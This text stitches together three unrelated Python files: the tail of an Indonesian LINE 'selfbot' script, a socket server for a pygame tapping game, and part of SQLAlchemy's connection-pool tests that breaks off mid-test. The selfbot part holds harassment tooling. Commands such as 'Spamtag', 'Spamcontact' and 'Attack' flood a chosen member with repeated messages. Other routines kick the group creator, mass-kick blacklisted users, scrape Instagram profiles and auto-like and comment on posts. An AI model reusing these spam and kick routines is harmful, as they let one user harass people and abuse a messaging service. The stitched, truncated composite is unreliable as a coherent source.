cl.getGroup(i) if h == saya: cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus) elif "Grupname" in msg.text: saya = msg.text.replace('Grupname','') gid = cl.getGroup(msg.to) cl.sendText(msg.to, "[Nama Grup : ]\n" + gid.name) elif "Grupid" in msg.text: saya = msg.text.replace('Grupid','') gid = cl.getGroup(msg.to) cl.sendText(msg.to, "[ID Grup : ]\n" + gid.id) elif "Grupinfo: " in msg.text: saya = msg.text.replace('Grupinfo: ','') gid = cl.getGroupIdsJoined() for i in gid: h = cl.getGroup(i).name group = cl.getGroup(i) if h == saya: try: creator = group.creator.mid msg.contentType = 13 msg.contentMetadata = {'mid': creator} md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan" else: md += "\n\nKode Url : Diblokir" if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang" else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang" cl.sendText(msg.to,md) cl.sendMessage(msg) cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus) except: creator = "Error" elif "Spamtag @" in msg.text: _name = msg.text.replace("Spamtag @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: xname = g.displayName xlen = str(len(xname)+1) msg.contentType = 0 msg.text = "@"+xname+" " msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'} cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) print "Spamtag Berhasil." elif "/Spamcontact @" in msg.text: _name = msg.text.replace("Spamcontact @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: msg.contentType = 13 msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"} cl.sendText(g.mid,"Spam") cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendText(msg.to, "Done") print " Spammed !" elif "playstore " in msg.text.lower(): tob = msg.text.lower().replace("playstore ","") cl.sendText(msg.to,"Sedang Mencari om...") cl.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob) cl.sendText(msg.to,"Ketemu om ^") elif 'wikipedia ' in msg.text.lower(): try: wiki = msg.text.lower().replace("wikipedia ","") wikipedia.set_lang("id") pesan="Title (" pesan+=wikipedia.page(wiki).title pesan+=")\n\n" pesan+=wikipedia.summary(wiki, sentences=3) pesan+="\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except: try: pesan="Teks nya kepanjangan! ketik link dibawah aja\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except Exception as e: cl.sendText(msg.to, str(e)) elif "say " in msg.text.lower(): say = msg.text.lower().replace("say ","") lang = 'id' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif msg.text in ["spam gift 25"]: msg.contentType = 9 msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4', 'PRDTYPE': 'THEME', 'MSGTPL': '8'} msg.text = None cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) elif msg.text in ["Gcreator:inv"]: if msg.from_ in admin: ginfo = cl.getGroup(msg.to) gCreator = ginfo.creator.mid try: cl.findAndAddContactsByMid(gCreator) cl.inviteIntoGroup(msg.to,[gCreator]) print "success inv gCreator" except: pass elif msg.text in ["Gcreator:kick"]: if msg.from_ in admin: ginfo = cl.getGroup(msg.to) gCreator = ginfo.creator.mid try: cl.findAndAddContactsByMid(gCreator) cl.kickoutFromGroup(msg.to,[gCreator]) print "success inv gCreator" except: pass elif 'lirik ' in msg.text.lower(): try: songname = msg.text.lower().replace('lirik ','') params = {'songname': songname} r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params)) data = r.text data = json.loads(data) for song in data: hasil = 'Lyric Lagu (' hasil += song[0] hasil += ')\n\n' hasil += song[5] cl.sendText(msg.to, hasil) except Exception as wak: cl.sendText(msg.to, str(wak)) elif "Getcover @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("Getcover @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) cu = cl.channel.getCover(target) path = str(cu) cl.sendImageWithURL(msg.to, path) except: pass print "[Command]dp executed" elif "idline: " in msg.text: msgg = msg.text.replace('idline: ','') conn = cl.findContactsByUserid(msgg) if True: msg.contentType = 13 msg.contentMetadata = {'mid': conn.mid} cl.sendText(msg.to,"http://line.me/ti/p/~" + msgg) cl.sendMessage(msg) elif "reinvite" in msg.text.split(): if msg.toType == 2: group = cl.getGroup(msg.to) if group.invitee is not None: try: grCans = [contact.mid for contact in group.invitee] cl.findAndAddContactByMid(msg.to, grCans) cl.cancelGroupInvitation(msg.to, grCans) cl.inviteIntoGroup(msg.to, grCans) except Exception as error: print error else: if wait["lang"] == "JP": cl.sendText(msg.to,"No Invited") else: cl.sendText(msg.to,"Error") else: pass elif msg.text.lower() == 'runtime': eltime = time.time() - mulai van = "Bot sudah berjalan selama "+waktu(eltime) cl.sendText(msg.to,van) elif msg.text in ["Restart"]: cl.sendText(msg.to, "Bot has been restarted") restart_program() print "@Restart" elif msg.text in ["time"]: timeNow = datetime.now() timeHours = datetime.strftime(timeNow,"(%H:%M)") day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"] hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"] bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"] inihari = datetime.today() hr = inihari.strftime('%A') bln = inihari.strftime('%m') for i in range(len(day)): if hr == day[i]: hasil = hari[i] for k in range(0, len(bulan)): if bln == str(k): blan = bulan[k-1] rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]" client.sendText(msg.to, rst) elif "image " in msg.text: search = msg.text.replace("image ","") url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search raw_html = (download_page(url)) items = [] items = items + (_images_get_all_items(raw_html)) path = random.choice(items) print path try: cl.sendImageWithURL(msg.to,path) except: pass elif 'instagram ' in msg.text.lower(): try: instagram = msg.text.lower().replace("instagram ","") html = requests.get('https://www.instagram.com/' + instagram + '/?') soup = BeautifulSoup(html.text, 'html5lib') data = soup.find_all('meta', attrs={'property':'og:description'}) text = data[0].get('content').split() data1 = soup.find_all('meta', attrs={'property':'og:image'}) text1 = data1[0].get('content').split() user = "Name: " + text[-2] + "\n" user1 = "Username: " + text[-1] + "\n" followers = "Followers: " + text[0] + "\n" following = "Following: " + text[2] + "\n" post = "Post: " + text[4] + "\n" link = "Link: " + "https://www.instagram.com/" + instagram detail = "**INSTAGRAM INFO USER**\n" details = "\n**INSTAGRAM INFO USER**" cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details) cl.sendImageWithURL(msg.to, text1[0]) except Exception as njer: cl.sendText(msg.to, str(njer)) elif msg.text in ["Attack"]: msg.contentType = 13 msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"} cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) elif msg.text.lower() == '.....': msg.contentType = 13 msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"} cl.sendMessage(msg) #=================================PUY SCRIPT FINISHED =============================================# elif "Ban @" in msg.text: if msg.toType == 2: _name = msg.text.replace("Ban @","") _nametarget = _name.rstrip() gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,_nametarget + " Not Found") else: for target in targets: try: wait["blacklist"][target] = True cl.sendText(msg.to,_nametarget + " Succes Add to Blacklist") except: cl.sendText(msg.to,"Error") elif "Unban @" in msg.text: if msg.toType == 2: _name = msg.text.replace("Unban @","") _nametarget = _name.rstrip() gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,_nametarget + " Not Found") else: for target in targets: try: del wait["blacklist"][target] cl.sendText(msg.to,_nametarget + " Delete From Blacklist") except: cl.sendText(msg.to,_nametarget + " Not In Blacklist") elif "Ban:" in msg.text: nk0 = msg.text.replace("Ban:","") nk1 = nk0.lstrip() nk2 = nk1.replace("","") nk3 = nk2.rstrip() _name = nk3 gs = cl.getGroup(msg.to) targets = [] for s in gs.members: if _name in s.displayName: targets.append(s.mid) if targets == []: sendMessage(msg.to,"user does not exist") pass else: for target in targets: try: wait["blacklist"][target] = True f=codecs.open('st2__b.json','w','utf-8') json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False) cl.sendText(msg.to,_name + " Succes Add to Blacklist") except: cl.sendText(msg.to,"Error") elif "Unban:" in msg.text: nk0 = msg.text.replace("Unban:","") nk1 = nk0.lstrip() nk2 = nk1.replace("","") nk3 = nk2.rstrip() _name = nk3 gs = cl.getGroup(msg.to) targets = [] for s in gs.members: if _name in s.displayName: targets.append(s.mid) if targets == []: sendMessage(msg.to,"user does not exist") pass else: for target in targets: try: del wait["blacklist"][target] f=codecs.open('st2__b.json','w','utf-8') json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False) cl.sendText(msg.to,_name + " Delete From Blacklist") except: cl.sendText(msg.to,_name + " Not In Blacklist") elif msg.text in ["Clear"]: wait["blacklist"] = {} cl.sendText(msg.to,"Blacklist Telah Dibersihkan") elif msg.text in ["Ban:on"]: wait["wblacklist"] = True cl.sendText(msg.to,"Send Contact") elif msg.text in ["Unban:on"]: wait["dblacklist"] = True cl.sendText(msg.to,"Send Contact") elif msg.text in ["Banlist"]: if wait["blacklist"] == {}: cl.sendText(msg.to,"Tidak Ada Blacklist") else: cl.sendText(msg.to,"Daftar Banlist") num=1 msgs="*Blacklist*" for mi_d in wait["blacklist"]: msgs+="\n[%i] %s" % (num, cl.getContact(mi_d).displayName) num=(num+1) msgs+="\n*Blacklist*\n\nTotal Blacklist : %i" % len(wait["blacklist"]) cl.sendText(msg.to, msgs) elif msg.text in ["Conban","Contactban","Contact ban"]: if wait["blacklist"] == {}: cl.sendText(msg.to,"Tidak Ada Blacklist") else: cl.sendText(msg.to,"Daftar Blacklist") h = "" for i in wait["blacklist"]: h = cl.getContact(i) M = Message() M.to = msg.to M.contentType = 13 M.contentMetadata = {'mid': i} cl.sendMessage(M) elif msg.text in ["Midban","Mid ban"]: if msg.toType == 2: group = cl.getGroup(msg.to) gMembMids = [contact.mid for contact in group.members] matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, gMembMids) num=1 cocoa = "══════════List Blacklist═════════" for mm in matched_list: cocoa+="\n[%i] %s" % (num, mm) num=(num+1) cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list) cl.sendText(msg.to,cocoa) elif msg.text.lower() == 'scan blacklist': if msg.toType == 2: group = cl.getGroup(msg.to) gMembMids = [contact.mid for contact in group.members] matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, gMembMids) if matched_list == []: cl.sendText(msg.to,"Tidak ada Daftar Blacklist") return for jj in matched_list: try: cl.kickoutFromGroup(msg.to,[jj]) print (msg.to,[jj]) except: pass #==============================================# if op.type == 17: if op.param2 not in Bots: if op.param2 in Bots: pass if wait["protect"] == True: if wait["blacklist"][op.param2] == True: try: cl.kickoutFromGroup(op.param1,[op.param2]) G = cl.getGroup(op.param1) G.preventJoinByTicket = True cl.updateGroup(G) except: try: cl.kickoutFromGroup(op.param1,[op.param2]) G = cl.getGroup(op.param1) G.preventJoinByTicket = True cl.updateGroup(G) except: pass if op.type == 19: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["protect"] == True: wait ["blacklist"][op.param2] = True cl.kickoutFromGroup(op.param1,[op.param2]) cl.inviteIntoGroup(op.param1,[op.param2]) if op.type == 13: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["inviteprotect"] == True: wait ["blacklist"][op.param2] = True cl.kickoutFromGroup(op.param1,[op.param2]) if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["inviteprotect"] == True: wait ["blacklist"][op.param2] = True cl.cancelGroupInvitation(op.param1,[op.param3]) if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["cancelprotect"] == True: wait ["blacklist"][op.param2] = True cl.cancelGroupInvitation(op.param1,[op.param3]) if op.type == 11: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["linkprotect"] == True: wait ["blacklist"][op.param2] = True G = cl.getGroup(op.param1) G.preventJoinByTicket = True cl.updateGroup(G) cl.kickoutFromGroup(op.param1,[op.param2]) if op.type == 5: if wait["autoAdd"] == True: if (wait["message"] in [""," ","\n",None]): pass else: cl.sendText(op.param1,str(wait["message"])) if op.type == 11: if wait["linkprotect"] == True: if op.param2 not in Bots: G = cl.getGroup(op.param1) G.preventJoinByTicket = True cl.kickoutFromGroup(op.param1,[op.param3]) cl.updateGroup(G) if op.type == 17: if op.param2 in Bots: return ginfo = cl.getGroup(op.param1) random.choice(KAC).sendText(op.param1, "Selamat Datang.") print "MEMBER HAS JOIN THE GROUP" if op.type == 15: if op.param2 in Bots: return random.choice(KAC).sendText(op.param1, "Selamat Jalan.") print "MEMBER HAS LEFT THE GROUP" #------------------------------------------------------------------------------# if op.type == 55: try: if op.param1 in wait2['readPoint']: if op.param2 in wait2['readMember'][op.param1]: pass else: wait2['readMember'][op.param1] += op.param2 wait2['ROM'][op.param1][op.param2] = op.param2 with open('sider.json', 'w') as fp: json.dump(wait2, fp, sort_keys=True, indent=4) else: pass except: pass if op.type == 59: print op except Exception as error: print error def autolike(): count = 1 while True: try: for posts in cl.activity(1)["result"]["posts"]: if posts["postInfo"]["liked"] is False: if wait["likeOn"] == True: cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001) print "Like" if wait["commentOn"] == True: if posts["userInfo"]["writerMid"] in wait["commentBlack"]: pass else: cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"]) except: count += 1 if(count == 50): sys.exit(0) else: pass thread2 = threading.Thread(target=autolike) thread2.daemon = True thread2.start() def likefriend(): for zx in range(0,20): hasil = cl.activity(limit=20) if hasil['result']['posts'][zx]['postInfo']['liked'] == False: try: cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001) print "Like" except: pass else: print "Already Liked Om" time.sleep(0.60) def likeme(): for zx in range(0,20): hasil = cl.activity(limit=20) if hasil['result']['posts'][zx]['postInfo']['liked'] == False: if hasil['result']['posts'][zx]['userInfo']['mid'] in mid: try: cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002) print "Like" except: pass else: print "Status Sudah di Like Om" while True: try: Ops = cl.fetchOps(cl.Poll.rev, 5) except EOFError: raise Exception("It might be wrong revision\n" + str(cl.Poll.rev)) for Op in Ops: if (Op.type != OpType.END_OF_OPERATION): cl.Poll.rev = max(cl.Poll.rev, Op.revision) bot(Op)
server.py
import socket from select import select from utils import send import pygame import sys import csv from time import time import os import json import threading import config as cfg class Server: def __init__(self, host: str, port: int): self._host = host self._port = port self._to_client_connections = [] self._from_client_connections = {} # Establish connection where clients can get game state update self._to_client_request = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self._to_client_request.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Reuse socket self._to_client_request.bind((self._host, self._port)) self._to_client_request.setblocking(False) # Establish connection where clients send control commands self._from_client_request = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self._from_client_request.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Reuse socket self._from_client_request.bind((self._host, self._port + 1)) self._from_client_request.setblocking(False) self._exit_request = False self._state = {} self._current_session_index = -1 self._paused = True self._counter = 0.0 self._counter_target = cfg.SECONDS_COUNT_DOWN self._thread_lock = threading.Lock() print(f"[NETWORK] ({self._host}, {self._port})") csv_data_path = "./data/" if not os.path.exists(csv_data_path): os.makedirs(csv_data_path) self._csv_file = open(csv_data_path + str(int(time())) + ".csv", 'w', newline='') self._csv_writer = csv.writer(self._csv_file, delimiter=';') def run(self): """ Set up threads for handling connections """ to_client_request_thread = threading.Thread(target=self._dispatch_to_client_request, daemon=True) to_client_request_thread.start() from_client_request_thread = threading.Thread(target=self._dispatch_from_client_request, daemon=True) from_client_request_thread.start() from_client_commands_thread = threading.Thread(target=self._from_client_commands, daemon=True) from_client_commands_thread.start() to_client_update_state_thread = threading.Thread(target=self._to_client_update_state, daemon=True) to_client_update_state_thread.start() server_control_thread = threading.Thread(target=self._server_control, daemon=True) server_control_thread.start() # Wait for threads to finish to_client_request_thread.join() from_client_request_thread.join() from_client_commands_thread.join() to_client_update_state_thread.join() server_control_thread.join() # Close server connection self._to_client_request.close() self._from_client_request.close() def _dispatch_to_client_request(self): """ Dispatch client's connection for receiving game state updates from server """ # Listen for client connection self._to_client_request.listen() while not self._exit_request: readable, _, _ = select([self._to_client_request], [], [self._to_client_request], 0.1) if readable: client_conn, client_addr = readable[0].accept() client_conn.setblocking(False) self._to_client_connections.append(client_conn) print("Sending replies to [" + client_addr[0] + ", " + str(client_addr[1]) + ']') def _dispatch_from_client_request(self): """ Establish connection to receive clients' command """ # Listen for client connection self._from_client_request.listen() while not self._exit_request: readable, _, _ = select([self._from_client_request], [], [self._from_client_request], 0.1) if readable: client_conn, client_addr = readable[0].accept() client_conn.setblocking(False) client_name_read, _, _ = select([client_conn], [], [client_conn]) if client_name_read: client_name = json.loads(client_name_read[0].recv(cfg.HEADER).decode('utf-8')) else: print("Connection closed") continue self._thread_lock.acquire() self._from_client_connections[client_conn] = client_name self._state[client_name] = 0 self._thread_lock.release() print("Receiving commands from [" + client_name + ", " + client_addr[0] + ", " + str(client_addr[1]) + ']') def _to_client_update_state(self): """ Update game state then send game state updates to clients """ start_ticks = pygame.time.get_ticks() clock = pygame.time.Clock() while not self._exit_request: if self._paused: data = {} data["message_type"] = "state" data["state"] = self._state data["session_index"] = self._current_session_index data["timer"] = int(self._counter_target - self._counter + 1.0) _, writable, exceptional = select([], self._to_client_connections, self._to_client_connections, 0) for connection in writable: try: send(connection, data) except: print("Connection closed") connection.close() self._to_client_connections.remove(connection) for connection in exceptional: connection.close() self._to_client_connections.remove(connection) start_ticks = pygame.time.get_ticks() clock.tick(10) continue seconds = (pygame.time.get_ticks() - start_ticks)/1000.0 if self._counter > self._counter_target: self._current_session_index += 1 if self._current_session_index >= len(cfg.SESSION): self._exit_request = True break self._counter_target = cfg.SECONDS_PER_SESSION[self._current_session_index] self._counter = 0.0 start_ticks = pygame.time.get_ticks() elif seconds >= self._counter: self._counter += 1.0 data = {} data["message_type"] = "state" data["state"] = self._state data["session_index"] = self._current_session_index data["timer"] = int(self._counter_target - self._counter + 1.0) # Record state of the game self._csv_writer.writerow([time(), json.dumps(data)]) _, writable, exceptional = select([], self._to_client_connections, self._to_client_connections, 0) for connection in writable: try: send(connection, data) except: print("Connection closed") connection.close() self._to_client_connections.remove(connection) for connection in exceptional: connection.close() self._to_client_connections.remove(connection) clock.tick(60) while self._to_client_connections: _, writable, exceptional = select([], self._to_client_connections, self._to_client_connections) for connection in writable: data = {} data["message_type"] = "command" data["message"] = "CLOSE" try: send(connection, data) except BrokenPipeError: print("Connection closed") connection.close() self._to_client_connections.remove(connection) for connection in exceptional: connection.close() self._to_client_connections.remove(connection) clock.tick(60) def _from_client_commands(self): """ Handle clients' commands """ while not self._exit_request: readable, _, exceptional = select(self._from_client_connections.keys(), [], self._from_client_connections.keys(), 0.2) for name in self._state.keys(): self._state[name] = 0 for connection in readable: client_name = self._from_client_connections[connection] message = connection.recv(cfg.HEADER) if not message: continue try: command = json.loads(message.decode('utf-8')) except json.decoder.JSONDecodeError as err: print(err) continue if command == "TAP": self._state[client_name] = 1 elif command == "CLOSE": connection.close() self._thread_lock.acquire() del self._from_client_connections[connection] del self._state[client_name] self._thread_lock.release() for connection in exceptional: connection.close() self._thread_lock.acquire() del self._from_client_connections[connection] del self._state[client_name] self._thread_lock.release() for connection in self._from_client_connections: connection.close() def _server_control(self): """ Control the server """ while not self._exit_request: readable, _, _ = select([sys.stdin], [], [], 0.5) if not readable: continue command = readable[0].readline().strip() if command == "h" or command == "help": print("-----") print("unpause: Unpause the game") print("restart: Restart the game") print("exit: Close the server") print("h or help: List available commands") print("-----") elif command == "unpause": self._paused = False elif command == "restart": self._paused = True self._counter = 0.0 self._counter_target = cfg.SECONDS_COUNT_DOWN self._current_session_index = -1 elif command == "exit": self._exit_request = True else: print("Unknown command") if __name__ == "__main__": pygame.init() assert len(sys.argv) >= 2 host = sys.argv[1] port = 6060 if len(sys.argv) < 3 else int(sys.argv[2]) server = Server(host, port) server.run()
test_pool.py
import threading import time from sqlalchemy import pool, select, event import sqlalchemy as tsa from sqlalchemy import testing from sqlalchemy.testing.util import gc_collect, lazy_gc from sqlalchemy.testing import eq_, assert_raises, is_not_ from sqlalchemy.testing.engines import testing_engine from sqlalchemy.testing import fixtures from sqlalchemy.testing.mock import Mock, call join_timeout = 10 def MockDBAPI(): def cursor(): while True: yield Mock() def connect(): while True: yield Mock(cursor=Mock(side_effect=cursor())) def shutdown(value): if value: db.connect = Mock(side_effect=Exception("connect failed")) else: db.connect = Mock(side_effect=connect()) db = Mock(connect=Mock(side_effect=connect()), shutdown=shutdown, _shutdown=False) return db class PoolTestBase(fixtures.TestBase): def setup(self): pool.clear_managers() @classmethod def teardown_class(cls): pool.clear_managers() def _queuepool_fixture(self, **kw): dbapi, pool = self._queuepool_dbapi_fixture(**kw) return pool def _queuepool_dbapi_fixture(self, **kw): dbapi = MockDBAPI() return dbapi, pool.QueuePool(creator=lambda: dbapi.connect('foo.db'), **kw) class PoolTest(PoolTestBase): def test_manager(self): manager = pool.manage(MockDBAPI(), use_threadlocal=True) c1 = manager.connect('foo.db') c2 = manager.connect('foo.db') c3 = manager.connect('bar.db') c4 = manager.connect("foo.db", bar="bat") c5 = manager.connect("foo.db", bar="hoho") c6 = manager.connect("foo.db", bar="bat") assert c1.cursor() is not None assert c1 is c2 assert c1 is not c3 assert c4 is c6 assert c4 is not c5 def test_manager_with_key(self): dbapi = MockDBAPI() manager = pool.manage(dbapi, use_threadlocal=True) c1 = manager.connect('foo.db', sa_pool_key="a") c2 = manager.connect('foo.db', sa_pool_key="b") c3 = manager.connect('bar.db', sa_pool_key="a") assert c1.cursor() is not None assert c1 is not c2 assert c1 is c3 eq_(dbapi.connect.mock_calls, [ call("foo.db"), call("foo.db"), ] ) def test_bad_args(self): manager = pool.manage(MockDBAPI()) manager.connect(None) def test_non_thread_local_manager(self): manager = pool.manage(MockDBAPI(), use_threadlocal=False) connection = manager.connect('foo.db') connection2 = manager.connect('foo.db') self.assert_(connection.cursor() is not None) self.assert_(connection is not connection2) @testing.fails_on('+pyodbc', "pyodbc cursor doesn't implement tuple __eq__") def test_cursor_iterable(self): conn = testing.db.raw_connection() cursor = conn.cursor() cursor.execute(str(select([1], bind=testing.db))) expected = [(1, )] for row in cursor: eq_(row, expected.pop(0)) def test_no_connect_on_recreate(self): def creator(): raise Exception("no creates allowed") for cls in (pool.SingletonThreadPool, pool.StaticPool, pool.QueuePool, pool.NullPool, pool.AssertionPool): p = cls(creator=creator) p.dispose() p2 = p.recreate() assert p2.__class__ is cls mock_dbapi = MockDBAPI() p = cls(creator=mock_dbapi.connect) conn = p.connect() conn.close() mock_dbapi.connect.side_effect = Exception("error!") p.dispose() p.recreate() def testthreadlocal_del(self): self._do_testthreadlocal(useclose=False) def testthreadlocal_close(self): self._do_testthreadlocal(useclose=True) def _do_testthreadlocal(self, useclose=False): dbapi = MockDBAPI() for p in pool.QueuePool(creator=dbapi.connect, pool_size=3, max_overflow=-1, use_threadlocal=True), \ pool.SingletonThreadPool(creator=dbapi.connect, use_threadlocal=True): c1 = p.connect() c2 = p.connect() self.assert_(c1 is c2) c3 = p.unique_connection() self.assert_(c3 is not c1) if useclose: c2.close() else: c2 = None c2 = p.connect() self.assert_(c1 is c2) self.assert_(c3 is not c1) if useclose: c2.close() else: c2 = None lazy_gc() if useclose: c1 = p.connect() c2 = p.connect() c3 = p.connect() c3.close() c2.close() self.assert_(c1.connection is not None) c1.close() c1 = c2 = c3 = None # extra tests with QueuePool to ensure connections get # __del__()ed when dereferenced if isinstance(p, pool.QueuePool): lazy_gc() self.assert_(p.checkedout() == 0) c1 = p.connect() c2 = p.connect() if useclose: c2.close() c1.close() else: c2 = None c1 = None lazy_gc() self.assert_(p.checkedout() == 0) def test_info(self): p = self._queuepool_fixture(pool_size=1, max_overflow=0) c = p.connect() self.assert_(not c.info) self.assert_(c.info is c._connection_record.info) c.info['foo'] = 'bar' c.close() del c c = p.connect() self.assert_('foo' in c.info) c.invalidate() c = p.connect() self.assert_('foo' not in c.info) c.info['foo2'] = 'bar2' c.detach() self.assert_('foo2' in c.info) c2 = p.connect() is_not_(c.connection, c2.connection) assert not c2.info assert 'foo2' in c.info class PoolDialectTest(PoolTestBase): def _dialect(self): canary = [] class PoolDialect(object): def do_rollback(self, dbapi_connection): canary.append('R') dbapi_connection.rollback() def do_commit(self, dbapi_connection): canary.append('C') dbapi_connection.commit() def do_close(self, dbapi_connection): canary.append('CL') dbapi_connection.close() return PoolDialect(), canary def _do_test(self, pool_cls, assertion): mock_dbapi = MockDBAPI() dialect, canary = self._dialect() p = pool_cls(creator=mock_dbapi.connect) p._dialect = dialect conn = p.connect() conn.close() p.dispose() p.recreate() conn = p.connect() conn.close() eq_(canary, assertion) def test_queue_pool(self): self._do_test(pool.QueuePool, ['R', 'CL', 'R']) def test_assertion_pool(self): self._do_test(pool.AssertionPool, ['R', 'CL', 'R']) def test_singleton_pool(self): self._do_test(pool.SingletonThreadPool, ['R', 'CL', 'R']) def test_null_pool(self): self._do_test(pool.NullPool, ['R', 'CL', 'R', 'CL']) def test_static_pool(self): self._do_test(pool.StaticPool, ['R', 'R']) class PoolEventsTest(PoolTestBase): def _first_connect_event_fixture(self): p = self._queuepool_fixture() canary = [] def first_connect(*arg, **kw): canary.append('first_connect') event.listen(p, 'first_connect', first_connect) return p, canary def _connect_event_fixture(self): p = self._queuepool_fixture() canary = [] def connect(*arg, **kw): canary.append('connect') event.listen(p, 'connect', connect) return p, canary def _checkout_event_fixture(self): p = self._queuepool_fixture() canary = [] def checkout(*arg, **kw): canary.append('checkout') event.listen(p, 'checkout', checkout) return p, canary def _checkin_event_fixture(self): p = self._queuepool_fixture() canary = [] def checkin(*arg, **kw): canary.append('checkin') event.listen(p, 'checkin', checkin) return p, canary def _reset_event_fixture(self): p = self._queuepool_fixture() canary = [] def reset(*arg, **kw): canary.append('reset') event.listen(p, 'reset', reset) return p, canary def _invalidate_event_fixture(self): p = self._queuepool_fixture() canary = Mock() event.listen(p, 'invalidate', canary) return p, canary def test_first_connect_event(self): p, canary = self._first_connect_event_fixture() c1 = p.connect() eq_(canary, ['first_connect']) def test_first_connect_event_fires_once(self): p, canary = self._first_connect_event_fixture() c1 = p.connect() c2 = p.connect() eq_(canary, ['first_connect']) def test_first_connect_on_previously_recreated(self): p, canary = self._first_connect_event_fixture() p2 = p.recreate() c1 = p.connect() c2 = p2.connect() eq_(canary, ['first_connect', 'first_connect']) def test_first_connect_on_subsequently_recreated(self): p, canary = self._first_connect_event_fixture() c1 = p.connect() p2 = p.recreate() c2 = p2.connect() eq_(canary, ['first_connect', 'first_connect']) def test_connect_event(self): p, canary = self._connect_event_fixture() c1 = p.connect() 